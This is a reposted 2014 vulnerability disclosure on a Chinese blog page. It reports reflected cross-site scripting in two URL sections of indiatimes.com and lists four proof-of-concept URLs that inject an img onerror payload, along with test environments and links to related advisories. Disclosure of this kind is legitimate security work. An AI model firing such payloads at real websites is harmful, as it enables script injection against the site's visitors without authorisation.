咬定青山不放松,立根原在破岩中。千磨万击还坚劲,任尔东西南北风

© 竹意 | Powered by LOFTER

【转载】All Links in Two Topics of Indiatimes (indiati

来自:greenlife


All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (cross site scripting) Attacks 

 

 

Domain Description:

http://www.indiatimes.com

 

"According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership." (en.Wikipedia.org)

 

 

 

 

Vulnerability description:

The vulnerability occurs at Indiatimes's URL links. Indiatimes only filter part of the filenames in its website. All URLs under Indiatimes's "photogallery" and "top-llists" topics are affected. 

 

Indiatimes uses part of the links under "photogallery" and "top-llists" topics to construct its website content without any checking of those links at all. This mistake is very popular in nowaday websites. Developer is not security expert.

 

 

The vulnerability can be attacked without user login. Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7.








 

 

 

 

 

 

POC Codes:

http://www.indiatimes.com/photogallery/"><img src=x onerror=prompt('justqdjing')>

http://www.indiatimes.com/top-lists/"><img src=x onerror=prompt('justqdjing')>

http://www.indiatimes.com/photogallery/lifestyle/"><img src=x onerror=prompt('justqdjing')>

http://www.indiatimes.com/top-lists/technology/"><img src=x onerror=prompt('justqdjing')>

 




 

 

POC Video:

https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be

Blog Details:

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html

 

 

 

 

 

 

The vulnerabilities were reported to Indiatimes in early September, 2014. However they are still unpatched.

 

 

 



 


Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang Technological University, Singapore.

http://www.tetraph.com/wangjing/








Related Articles:

http://www.techworm.net/2014/12/times-india-website-vulnerable-cross-site-scripting-xss-attacks.html

http://seclists.org/fulldisclosure/2014/Nov/91

http://www.tetraph.com/blog/web-security/times-of-india-website-vulnerable-to-cross-site-scripting-xss-attacks/

https://cxsecurity.com/issue/WLB-2014120004

http://vulnerabilitypost.wordpress.com/2014/12/04/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/

http://whitehatpost.blog.163.com/blog/static/2422320542014114750445/#

http://user.qzone.qq.com/2519094351/blog/1417685447
 
评论
 
回到顶部